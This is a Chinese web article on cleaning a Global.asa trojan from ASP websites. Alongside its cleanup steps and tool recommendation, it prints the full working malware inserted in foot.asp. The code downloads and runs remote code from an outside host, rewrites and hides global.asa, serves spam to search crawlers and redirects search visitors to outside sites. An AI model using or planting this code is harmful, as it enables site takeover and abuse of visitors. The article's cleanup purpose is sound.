网站中Global.asa木马的快速清除方法

    解决办法:
    1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:https://www.lingkb.com/softs/12771.html
    2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码,如下图所示:

    3、关闭服务器上的缩略图功能 方法参考 https://www.lingkb.com/os/windows/Win2003/34960.html
    根源:
    这次用户中的是下载者类的木马,黑客通过网站上传漏洞上在网站根目录的foot.asp下插入了以下代码:

    复制代码

    代码如下:

    <%
    ‘by*aming
    Function Gethtml(url)
    Set ObjXMLHTTP=Server.CreateObject(“MSXML2.serverXMLHTTP”)
    ObjXMLHTTP.Open “GET”,url,False
    ObjXMLHTTP.setRequestHeader “User-Agent”,url
    ObjXMLHTTP.send
    Gethtml=ObjXMLHTTP.responseBody
    Set ObjXMLHTTP=Nothing
    set objStream = Server.CreateObject(“Adodb.Stream”)
    objStream.Type = 1
    objStream.Mode =3
    objStream.Open
    objStream.Write Gethtml
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = “gb2312”
    Gethtml = objStream.ReadText
    objStream.Close
    set objStream=Nothing
    End Function
    execute(Gethtml(“http://www.pornhome.com/dy7749/xmlasaquan.txt”))
    %>

    清掉这段代码即可解决问题,网站木马清理专家查杀结果如下图所示!

    xmlasaquan.txt的内容如下:

    复制代码

    代码如下:

    ‘<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title=””;document.body.innerHTML=Source;}</script></head><body onload=clear()>
    ‘<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!”.replace(/^/,String)){while(c–){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.1.2(\’3:4\’);’,5,5,’window|location|replace|about|blank’.split(‘|’),0,{}))</script>
    ‘by*aming
    Server.ScriptTimeout=600
    Public Function createasa(ByVal Content)
    On Error Resume Next
    Set fso = Server.CreateObject(“scripting.filesystemobject”)
    set f=fso.Getfile(“//./” & Server.MapPath(“/global.asa”))
    f.Attributes=0
    Set Obj = Server.CreateObject(“adod” & “b.S” & “tream”)
    Obj.Type = 2
    Obj.open
    Obj.Charset = “gb2312”
    Obj.Position = Obj.Size
    Obj.writetext = Content
    Obj.SaveToFile “//./” & Server.MapPath(“/global.asa”),2
    Obj.Close
    Set Obj = Nothing
    f.Attributes=1+2+4
    set f=Nothing
    Set fso = Nothing
    End Function
    Public Function GetHtml(url)
    Set ObjXMLHTTP=Server.CreateObject(“MSXML2.serverXMLHTTP”)
    ObjXMLHTTP.Open “GET”,url,False
    ObjXMLHTTP.setRequestHeader “User-Agent”,url
    ObjXMLHTTP.send
    GetHtml=ObjXMLHTTP.responseBody
    Set ObjXMLHTTP=Nothing
    set objStream = Server.CreateObject(“Adodb.Stream”)
    objStream.Type = 1
    objStream.Mode =3
    objStream.Open
    objStream.Write GetHtml
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = “gb2312”
    GetHtml = objStream.ReadText
    objStream.Close
    End Function
    Function check(user_agent)
    allow_agent=split(“Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp”,”,”)
    check_agent=false
    For agenti=lbound(allow_agent) to ubound(allow_agent)
    If instr(user_agent,allow_agent(agenti))>0 then
    check_agent=true
    exit for
    end if
    Next
    check=check_agent
    End function
    Function CheckRobot()
    CheckRobot = False
    Dim Botlist,i,Repls
    Repls = request.ServerVariables(“http_user_agent”)
    Krobotlist = “Baiduspider|Googlebot”
    Botlist = Split(Krobotlist,”|”)
    For i = 0 To Ubound(Botlist)
    If InStr(Repls,Botlist(i)) > 0 Then
    CheckRobot = True
    Exit For
    End If
    Next
    If Request.QueryString(“admin”)= “1” Then Session(“ThisCheckRobot”)=1
    If Session(“ThisCheckRobot”) = 1 Then CheckRobot = True
    End Function
    Function CheckRefresh()
    CheckRefresh = False
    Dim Botlist,i,Repls
    Krobotlist = “baidu|google|sogou|soso|youdao”
    Botlist = Split(Krobotlist,”|”)
    For i = 0 To Ubound(Botlist)
    If InStr(left(request.servervariables(“HTTP_REFERER”),”40″),Botlist(i)) > 0 Then
    CheckRefresh = True
    Exit For
    End If
    Next
    End Function
    Sub sleep()
    If response.IsClientConnected=true then
    Response.Flush
    else
    response.end
    end if
    End Sub
    If CheckRefresh=true Then
    cnnbd=lcase(request.servervariables(“HTTP_HOST”))
    response.redirect(“http://www.82767.com/?”&cnnbd&””)
    ‘Response.Write(“<a href=http://www.82767.com><font _fcksavedurl=”http://www.82767.com><font” color=#FF0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl=”http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script” src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>”)
    response.end
    end If
    user_agent=Request.ServerVariables(“HTTP_USER_AGENT”)
    if check(user_agent)=true then
    body=GetHtml(“http://fudu.qpedu.cn/xml/prn/con.2.asp?domain=”&strHost&”&ua=”&server.URLEncode(request.ServerVariables(“HTTP_USER_AGENT”))&””)
    response.write body
    response.end
    else
    asa=GetHtml(“http://www.pornhome.com/dy7749/codequan.txt”)
    if instr(asa,”by*aming”)>0 then
    createasa(asa)
    end if
    ScriptAddress=Request.ServerVariables(“SCRIPT_NAME”)
    namepath=Server.MapPath(ScriptAddress)
    If Len(Request.QueryString) > 0 Then
    ScriptAddress = ScriptAddress & “?” & Request.QueryString
    end if
    geturl =”http://”& Request.ServerVariables(“http_host”) & ScriptAddress
    geturl =LCase(geturl)
    ‘response.write replace(namepath,server.MapPath(“/”),””)
    ‘response.end
    ‘if instr(geturl,”jc=ok”)=0 and instr(geturl,”global=ok”)=0 and instr(LCase(Request.ServerVariables(“http_host”)),”gov.cn”)=0 and instr(LCase(Request.ServerVariables(“http_host”)),”edu.cn”)=0 and
    if instr(geturl,”http://”& Request.ServerVariables(“http_host”) &”/index.asp”)=0 and instr(geturl,”http://”& Request.ServerVariables(“http_host”) &”/”)=0 and instr(LCase(Request.ServerVariables(“HTTP_REFERER”)),LCase(Request.ServerVariables(“http_host”)))<=0 then
    agent = lcase(request.servervariables(“http_user_agent”))
    referer = LCase(Request.ServerVariables(“HTTP_REFERER”))
    bot = “”
    Amll = “”
    if instr(agent, “+”) > 0 then bot = agent
    if instr(agent, “-“) > 0 then bot = agent
    if instr(agent, “http”) > 0 then bot = agent
    if instr(agent, “spider”) > 0 then bot = agent
    if instr(agent, “bot”) > 0 then bot = agent
    if instr(agent, “linux”) > 0 then bot = agent
    if instr(agent, “baidu”) > 0 then bot = agent
    if instr(agent, “google”) > 0 then bot = “nobot”
    if instr(agent, “yahoo”) > 0 then bot = “nobot”
    if instr(agent, “msn”) > 0 then bot = “nobot”
    if instr(agent, “alexa”) > 0 then bot = “nobot”
    if instr(agent, “sogou”) > 0 then bot = “nobot”
    if instr(agent, “youdao”) > 0 then bot = “nobot”
    if instr(agent, “soso”) > 0 then bot = “nobot”
    if instr(agent, “iask”) > 0 then bot = “nobot”
    if bot=”nobot” then
    ‘Call WriteErr
    ‘response.end
    end if
    Call sleep()
    end if
    end if
    ‘</body></html>

发表评论

发表评论